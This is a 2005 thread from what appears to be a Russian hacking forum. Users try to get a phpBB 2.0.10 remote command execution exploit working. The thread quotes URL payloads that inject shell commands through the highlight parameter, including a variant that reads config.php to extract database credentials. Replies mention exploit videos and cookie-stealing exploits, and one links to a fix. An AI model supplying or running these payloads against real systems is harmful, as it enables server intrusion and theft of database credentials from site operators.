Проблема с phpbb 2.0.10

Thrasher · 13 Mar 2005

Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.

(-=util=-) · 13 Mar 2005

Юзай мазилку и пользуйся expl. для cookie 8)) Последнее видео качни одно снял KEZ второе max_pain.

buian · 13 Mar 2005

гЫ

гЫ на большиствах форумах етот эксплоит уже не пашет!! даже на тех из видио...

(-=util=-) · 13 Mar 2005

значит patched

temon · 13 Mar 2005

Thrasher said:

Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.
Click to expand...

Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db

Thrasher · 14 Mar 2005

Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Click to expand...

Так тоже пробовал, не помогает.

hacsoft · 15 Mar 2005

Да, тот метод закрывается легко.
Кому интересно как, см. на моем форуме: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=94

Проблема с phpbb 2.0.10

Thrasher New Member

(-=util=-) Banned

buian New Member

(-=util=-) Banned

temon Elder - Старейшина

Thrasher New Member

hacsoft Elder - Старейшина

Useful Searches

Проблема с phpbb 2.0.10

Thrasher New Member

(-=util=-) Banned

buian New Member

(-=util=-) Banned

temon Elder - Старейшина

Thrasher New Member

hacsoft Elder - Старейшина